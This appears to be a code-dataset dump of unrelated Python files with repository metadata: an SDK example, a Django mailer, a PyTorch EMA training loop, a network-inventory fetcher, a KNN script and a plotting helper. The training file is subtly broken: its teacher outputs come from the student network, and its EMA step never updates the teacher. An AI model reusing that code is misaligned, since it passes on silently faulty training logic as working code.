r = rcloud.User.getToken(userId='userid1', name='username', portraitUri='http://www.rongcloud.cn/images/logo.png')
print(r)
{'token': 'P9YNVZ2cMQwwaADiNDVrtRZKF+J2pVPOWSNlYMA1yA1g49pxjZs58n4FEufsH9XMCHTk6nHR6unQTuRgD8ZS/nlbkcv6ll4x', 'userId': 'userid1', 'code': 200}
r = rcloud.Message.publishPrivate(
fromUserId='userId1',
toUserId={"userId2","userid3","userId4"},
objectName='RC:VcMsg',
content='{"content":"hello","extra":"helloExtra","duration":20}',
pushContent='thisisapush',
pushData='{"pushData":"hello"}',
count='4',
verifyBlacklist='0',
isPersisted='0',
isCounted='0')
print(r)
{'code': 200}
'''
'''
More:
https://github.com/rongcloud/server-sdk-python
'''
| 27.085714
| 143
| 0.679325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 943
| 0.994726
|
c4311123dd5258af551865a612948896d2a1bbc9
| 2,132
|
py
|
Python
|
registration/email.py
|
openstack-kr/openinfradays-2018
|
9eb0e284ab95e177dc4acca17d63ccbdaff67fb1
|
[
"Apache-2.0"
] | null | null | null |
registration/email.py
|
openstack-kr/openinfradays-2018
|
9eb0e284ab95e177dc4acca17d63ccbdaff67fb1
|
[
"Apache-2.0"
] | 1
|
2018-06-17T02:21:41.000Z
|
2018-06-17T02:21:41.000Z
|
registration/email.py
|
openstack-kr/openinfradays-2018
|
9eb0e284ab95e177dc4acca17d63ccbdaff67fb1
|
[
"Apache-2.0"
] | 1
|
2018-05-31T11:39:02.000Z
|
2018-05-31T11:39:02.000Z
|
from django.core.mail import EmailMessage
from django.conf import settings
def send_email(name, date, email):
txt = """
<html>
<body>
<table cellpadding='0' cellspacing='0' width='100%' border='0'>
<tbody>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
안녕하세요 <span style='color:#3832D8'>{0}</span> 님,
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:30px;line-height:1.3;letter-spacing:-1.1px; text-align:left'>
OpenInfra Days Korea 2018
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
초청 티켓 등록이 완료되었습니다.
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
참가 일자 : {1}
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
<a href="http://invite.openinfradays.kr">티켓 확인</a>
</div>
</td>
</tr>
</tbody>
</table>
</body>
</html>
""".format(name, date)
email = EmailMessage(settings.EMAIL_TITLE, txt, to=(email,))
email.content_subtype = "html"
return email.send()
| 38.071429
| 147
| 0.60272
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,927
| 0.880713
|
c431a581714f033cba2ab3f52062e3fdddf8f0b8
| 5,767
|
py
|
Python
|
train_ema.py
|
qym7/WTALFakeLabels
|
139738025ab69f287c4fe3c97389a637f1a0b376
|
[
"MIT"
] | 3
|
2021-12-24T09:27:42.000Z
|
2022-01-03T10:59:47.000Z
|
train_ema.py
|
qym7/WTALFakeLabels
|
139738025ab69f287c4fe3c97389a637f1a0b376
|
[
"MIT"
] | 1
|
2021-12-26T02:40:40.000Z
|
2021-12-26T02:50:26.000Z
|
train_ema.py
|
qym7/WTALFakeLabels
|
139738025ab69f287c4fe3c97389a637f1a0b376
|
[
"MIT"
] | null | null | null |
'''
Author: your name
Date: 2021-12-25 17:33:51
LastEditTime: 2021-12-29 10:10:14
LastEditors: Please set LastEditors
Description: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE
FilePath: /yimingqin/code/WTAL-Uncertainty-Modeling/train.py
'''
import torch
import torch.nn as nn
import numpy as np
from collections import OrderedDict
import utils
class UM_loss(nn.Module):
def __init__(self, alpha, beta, lmbd, gamma, margin, thres):
super(UM_loss, self).__init__()
self.alpha = alpha
self.beta = beta
self.lmbd = lmbd
self.gamma = gamma
self.margin = margin
self.thres = thres
self.ce_criterion = nn.BCELoss()
self.l2_criterion = nn.MSELoss()
def balanced_ce(self, gt, cas):
loss = 0
count = 0
pmask = (gt > self.thres).float().cuda()
for i in range(cas.shape[0]):
for j in range(cas.shape[-1]):
if pmask[i, :, j].sum() > 0:
r = sum(pmask[i, :, j]==1) / float(pmask.shape[1])
coef_0 = 0.5 * r / (r - 1)
coef_1 = coef_0 * (r - 1)
# _loss = coef_1 * pmask[i, :, j] * torch.log(cas[i, :, j] + 0.00001) +\
# coef_0 * (1.0 - pmask[i, :, j]) * torch.log(1.0 - cas[i, :, j] + 0.00001)
_loss = torch.norm(cas[i, :, j] - pmask[i, :, j], p=2)
loss = loss + torch.mean(_loss)
count += 1
loss = loss / count
return loss
def forward(self, score_act, score_bkg, feat_act, feat_bkg, label,
gt, sup_cas, cas_s, cas_t):
loss = {}
label = label / torch.sum(label, dim=1, keepdim=True)
loss_cls = self.ce_criterion(score_act, label)
label_bkg = torch.ones_like(label).cuda()
label_bkg /= torch.sum(label_bkg, dim=1, keepdim=True)
loss_be = self.ce_criterion(score_bkg, label_bkg)
loss_act = self.margin - torch.norm(torch.mean(feat_act, dim=1), p=2, dim=1)
loss_act[loss_act < 0] = 0
loss_bkg = torch.norm(torch.mean(feat_bkg, dim=1), p=2, dim=1)
loss_um = torch.mean((loss_act + loss_bkg) ** 2)
loss_total = loss_cls + self.alpha * loss_um + self.beta * loss_be
if sup_cas is not None:
loss_sup = self.balanced_ce(gt, sup_cas)
loss["loss_sup"] = loss_sup
print("loss_sup", (self.lmbd*loss_sup).detach().cpu().item())
loss_total = loss_total + self.lmbd * loss_sup
if cas_s is not None:
# teacher student constrainte
loss_st = self.l2_criterion(cas_s, cas_t)
loss_total = loss_total + self.gamma * loss_st
print("loss_st", (self.gamma*loss_st).detach().cpu().item())
loss["loss_st"] = loss_st
loss["loss_cls"] = loss_cls
loss["loss_be"] = loss_be
loss["loss_um"] = loss_um
loss["loss_total"] = loss_total
print("loss_cls", loss_cls.detach().cpu().item())
print("loss_be", (self.beta * loss_be).detach().cpu().item())
print("loss_um", (self.alpha * loss_um).detach().cpu().item())
print("loss_total", loss_total.detach().cpu().item())
return loss_total, loss
def train(net_student, net_teacher, loader_iter, optimizer, criterion, logger, step, m):
net_student.train()
_data, _label, _gt, _, _ = next(loader_iter)
_data = _data.cuda()
_label = _label.cuda()
if _gt is not None:
_gt = _gt.cuda()
optimizer.zero_grad()
score_act, score_bkg, feat_act, feat_bkg, _, cas_softmax_s, sup_cas_softmax = net_student(_data)
_, _, _, _, _, cas_softmax_t, _ = net_student(_data)
# cas = None
# if net.self_train:
# feat_magnitudes_act = torch.mean(torch.norm(feat_act, dim=2), dim=1)
# feat_magnitudes_bkg = torch.mean(torch.norm(feat_bkg, dim=2), dim=1)
# feat_magnitudes = torch.norm(features, p=2, dim=2)
# feat_magnitudes = utils.minmax_norm(feat_magnitudes,
# max_val=feat_magnitudes_act,
# min_val=feat_magnitudes_bkg)
# feat_magnitudes = feat_magnitudes.repeat((cas_softmax.shape[-1], 1, 1)).permute(1, 2, 0)
# cas = utils.minmax_norm(cas_softmax * feat_magnitudes)
# if step < 10:
# cas_softmax_s = None
cost, loss = criterion(score_act, score_bkg, feat_act, feat_bkg, _label,
_gt, sup_cas_softmax, cas_softmax_s, cas_softmax_t)
# update student parameters by backprapagation
cost.backward()
optimizer.step()
# update teacher parameters by EMA
student_params = OrderedDict(net_student.named_parameters())
teacher_params = OrderedDict(net_teacher.named_parameters())
# check if both model contains the same set of keys
assert student_params.keys() == teacher_params.keys()
for name, param in student_params.items():
# see https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage
# shadow_variable -= (1 - decay) * (shadow_variable - variable)
teacher_params[name] = teacher_params[name] * m + (1 - m) * param
student_buffers = OrderedDict(net_student.named_buffers())
teacher_buffers = OrderedDict(net_teacher.named_buffers())
# check if both model contains the same set of keys
assert student_buffers.keys() == teacher_buffers.keys()
for name, buffer in student_buffers.items():
teacher_buffers[name] = teacher_buffers[name] * m + (1 - m) * buffer
for key in loss.keys():
logger.log_value(key, loss[key].cpu().item(), step)
| 38.704698
| 106
| 0.602393
| 2,945
| 0.508899
| 0
| 0
| 0
| 0
| 0
| 0
| 1,567
| 0.270779
|
c43395c47fe6f6295740535434326b1a38c6e0c8
| 3,597
|
py
|
Python
|
scan/fetchers/cli/cli_fetch_oteps_lxb.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
scan/fetchers/cli/cli_fetch_oteps_lxb.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
scan/fetchers/cli/cli_fetch_oteps_lxb.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
###############################################################################
# Copyright (c) 2017-2020 Koren Lev (Cisco Systems), #
# Yaron Yogev (Cisco Systems), Ilia Abashin (Cisco Systems) and others #
# #
# All rights reserved. This program and the accompanying materials #
# are made available under the terms of the Apache License, Version 2.0 #
# which accompanies this distribution, and is available at #
# http://www.apache.org/licenses/LICENSE-2.0 #
###############################################################################
from scan.fetchers.cli.cli_fetcher import CliFetcher
from scan.fetchers.db.db_access import DbAccess
class CliFetchOtepsLxb(CliFetcher, DbAccess):
def get(self, parent_id):
vconnector = self.inv.get_by_id(self.get_env(), parent_id)
if not vconnector:
return []
configurations = vconnector['configurations']
tunneling_ip = configurations['tunneling_ip']
tunnel_types_used = configurations['tunnel_types']
if not tunnel_types_used:
return []
tunnel_type = tunnel_types_used[0]
if not tunnel_type:
return []
# check only interfaces with name matching tunnel type
ret = [i for i in vconnector['interfaces'].values()
if i['name'].startswith(tunnel_type + '-')]
for otep in ret:
otep['ip_address'] = tunneling_ip
otep['host'] = vconnector['host']
self.get_otep_ports(otep)
otep['id'] = otep['host'] + '-otep-' + otep['name']
otep['name'] = otep['id']
otep['vconnector'] = vconnector['name']
otep['overlay_type'] = tunnel_type
self.get_udp_port(otep)
return ret
"""
fetch OTEP data from CLI command 'ip -d link show'
"""
def get_otep_ports(self, otep):
cmd = 'ip -d link show'
lines = self.run_fetch_lines(cmd, ssh_to_host=otep['host'])
header_format = '[0-9]+: ' + otep['name'] + ':'
interface_lines = self.get_section_lines(lines, header_format, '\S')
otep['data'] = '\n'.join(interface_lines)
regexps = [
{'name': 'state', 're': ',UP,', 'default': 'DOWN'},
{'name': 'mac_address', 're': '.*\slink/ether\s(\S+)\s'},
{'name': 'mtu', 're': '.*\smtu\s(\S+)\s'},
]
self.get_object_data(otep, interface_lines, regexps)
cmd = 'bridge fdb show'
dst_line_format = ' dev ' + otep['name'] + ' dst '
lines = self.run_fetch_lines(cmd, ssh_to_host=otep['host'])
lines = [l for l in lines if dst_line_format in l]
if lines:
l = lines[0]
otep['bridge dst'] = l[l.index(' dst ')+5:]
return otep
def get_udp_port(self, otep):
table_name = "{}.ml2_{}_endpoints".format(self.neutron_db,
otep['overlay_type'])
results = None
try:
results = self.get_objects_list_for_id(
"""
SELECT udp_port
FROM {}
WHERE host = %s
""".format(table_name),
"vedge", otep['host'])
except Exception as e:
self.log.error('failed to fetch UDP port for OTEP: ' + str(e))
otep['udp_port'] = 0
for result in results:
otep['udp_port'] = result['udp_port']
| 43.865854
| 79
| 0.512093
| 2,773
| 0.77092
| 0
| 0
| 0
| 0
| 0
| 0
| 1,449
| 0.402836
|
c433cd175dc051909207a6a2031e2dac3b9eff92
| 612
|
py
|
Python
|
appengine_config.py
|
ioriwitte/datavocab
|
5f99c679a23a164ab93ac1bcaf9a30a01728ee37
|
[
"Apache-2.0"
] | 13
|
2019-12-03T15:25:55.000Z
|
2021-10-16T00:18:47.000Z
|
appengine_config.py
|
jesman/schemaorg
|
6649c41e56a9724eaeed25dedf67736258f922bf
|
[
"Apache-2.0"
] | 11
|
2019-10-16T12:34:11.000Z
|
2021-02-04T11:23:03.000Z
|
appengine_config.py
|
jesman/schemaorg
|
6649c41e56a9724eaeed25dedf67736258f922bf
|
[
"Apache-2.0"
] | 9
|
2017-12-13T08:07:48.000Z
|
2019-06-18T14:30:12.000Z
|
"""`appengine_config` gets loaded when starting a new application instance."""
import vendor
# insert `lib` as a site directory so our `main` module can load
# third-party libraries, and override built-ins with newer
# versions.
vendor.add('lib')
import os
# Called only if the current namespace is not set.
def namespace_manager_default_namespace_for_request():
# The returned string will be used as the Google Apps domain.
applicationVersion="Default"
if "CURRENT_VERSION_ID" in os.environ:
applicationVersion = os.environ["CURRENT_VERSION_ID"].split('.')[0]
return applicationVersion
| 38.25
| 78
| 0.756536
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 379
| 0.619281
|
c433ed35cefab756913c6887caed7bdb03a9f9e5
| 270
|
py
|
Python
|
10_KNN_3D/main.py
|
ManMohan291/PyProgram
|
edcaa927bd70676bd14355acad7262ae2d32b8e5
|
[
"MIT"
] | 2
|
2018-09-07T17:44:54.000Z
|
2018-09-07T17:44:57.000Z
|
10_KNN_3D/main.py
|
ManMohan291/PyProgram
|
edcaa927bd70676bd14355acad7262ae2d32b8e5
|
[
"MIT"
] | null | null | null |
10_KNN_3D/main.py
|
ManMohan291/PyProgram
|
edcaa927bd70676bd14355acad7262ae2d32b8e5
|
[
"MIT"
] | null | null | null |
import KNN as K
K.clearScreen()
dataTraining= K.loadData("dataTraining.txt")
X=dataTraining[:,0:3]
initial_centroids=K.listToArray([[3, 3,3],[6, 2,4],[8,5,7]])
idx=K.KMean_Run(X,initial_centroids,5)
K.SaveData(K.concatenateVectors(X,idx))
K.plotKNN2(X,idx)
| 12.272727
| 60
| 0.703704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 18
| 0.066667
|
c434ee7e49ec7f84e8ed989b7259f62a6d292fde
| 3,793
|
py
|
Python
|
hummingbird/graphics/state_plotbox.py
|
don4get/hummingbird
|
ec9da37b74f17702201f475d79b842f41694c095
|
[
"MIT"
] | null | null | null |
hummingbird/graphics/state_plotbox.py
|
don4get/hummingbird
|
ec9da37b74f17702201f475d79b842f41694c095
|
[
"MIT"
] | null | null | null |
hummingbird/graphics/state_plotbox.py
|
don4get/hummingbird
|
ec9da37b74f17702201f475d79b842f41694c095
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pyqtgraph as pg
from pyqtgraph import ViewBox
from hummingbird.graphics.plotter_args import PlotBoxArgs
from hummingbird.graphics.state_plot import StatePlot
class StatePlotBox:
def __init__(self, window, args):
""" Create a new plotbox wrapper object
Arguments:
window (pg.GraphicsWindow): pyqtgraph window object in which to
place this plotbox
args (PlotboxArgs object): PlotboxArgs object which holds all the
appropriate arguments for the plotbox
"""
if not isinstance(args, PlotBoxArgs):
raise TypeError('\'args\' argument must be of type PlotboxArgs')
# Initlialize plotbox
if args.labels is not None:
self.plotbox = window.addPlot(title=args.title, labels=args.labels)
else:
self.plotbox = window.addPlot(labels={'left': args.title})
# Handle dimension parameters
self.dimension = len(args.plots[0].state_names)
if self.dimension == 1:
self.plotbox.setAutoVisible(y=True)
else:
self.plotbox.setAutoVisible(x=True, y=True)
self.plotbox.setAspectLocked() # Lock x/y ratio to be 1
# Handle color parameters
self.set_axis_color(args.axis_color, args.axis_width)
self.distinct_plot_hues = args.plot_hues
self.plot_min_hue = args.plot_min_hue
self.plot_max_hue = args.plot_max_hue
self.plot_min_value = args.plot_min_value
self.plot_max_value = args.plot_max_value
if args.legend:
self.add_legend()
# Plots related to this plotbox
self.plots = {}
for p in args.plots:
self.add_plot(p)
# Other args
self.time_window = args.time_window
def label_axes(self, x_label=None, y_label=None):
if x_label is not None:
self.plotbox.setLabel('bottom', x_label)
if y_label is not None:
self.plotbox.setLabel('left', y_label)
def set_axis_color(self, color, width=1):
self.axis_pen = pg.mkPen(color=color, width=width)
self.plotbox.getAxis("left").setPen(self.axis_pen)
self.plotbox.getAxis("bottom").setPen(self.axis_pen)
def add_legend(self):
self.plotbox.addLegend(size=(1, 1), offset=(1, 1))
def add_plot(self, plot_args):
if plot_args.color is None:
plot_args.set_color(self._get_color(len(self.plots)))
self.plots[plot_args.name] = StatePlot(self.plotbox, plot_args)
def get_states(self):
states = {}
for p in self.plots.values():
states.update(p.get_states())
return states
def get_xrange(self):
return self.plotbox.vb.targetRange()[0]
def get_yrange(self):
return self.plotbox.vb.targetRange()[1]
def update(self, t):
""" Update the plot data and adjust viewing range
Arguments:
t (float): the current time in seconds. Used to adjust the rolling
time window appropriately
"""
for p in self.plots.values():
p.update()
if self.dimension == 1:
x_min = max(t - self.time_window, 0)
x_max = t
self.plotbox.setXRange(x_min, x_max)
self.plotbox.enableAutoRange(axis=ViewBox.YAxis)
else:
self.plotbox.enableAutoRange(axis=ViewBox.XYAxes)
# TODO: Add 3D support here
def _get_color(self, index):
""" Returns incremental plot colors based on index """
return pg.intColor(index, minValue=self.plot_min_value, maxValue=self.plot_max_value,
hues=self.distinct_plot_hues, minHue=self.plot_min_hue, maxHue=self.plot_max_hue)
| 35.12037
| 108
| 0.627472
| 3,603
| 0.949908
| 0
| 0
| 0
| 0
| 0
| 0
| 842
| 0.221988
|
c4355d1898179dbc210d3d0618bca78d79edd5b7
| 348
|
py
|
Python
|
quizapp/jsonify_quiz_output.py
|
malgulam/100ProjectsOfCode
|
95026b15d858a6e97dfd847c5ec576bbc260ff61
|
[
"MIT"
] | 8
|
2020-12-13T16:15:34.000Z
|
2021-11-13T22:45:28.000Z
|
quizapp/jsonify_quiz_output.py
|
malgulam/100ProjectsOfCode
|
95026b15d858a6e97dfd847c5ec576bbc260ff61
|
[
"MIT"
] | 1
|
2021-06-02T03:42:39.000Z
|
2021-06-02T03:42:39.000Z
|
quizapp/jsonify_quiz_output.py
|
malgulam/100ProjectsOfCode
|
95026b15d858a6e97dfd847c5ec576bbc260ff61
|
[
"MIT"
] | 1
|
2020-12-14T20:01:14.000Z
|
2020-12-14T20:01:14.000Z
|
import json
#start
print('start')
with open('quizoutput.txt') as f:
lines = f.readlines()
print('loaded quiz data')
print('changing to json')
json_output = json.loads(lines[0])
print(json_output)
with open('quizoutput.txt', 'w') as f:
f.write(json_output)
# for item in json_output:
# print(item['question'])
# print('done')
| 19.333333
| 38
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 158
| 0.454023
|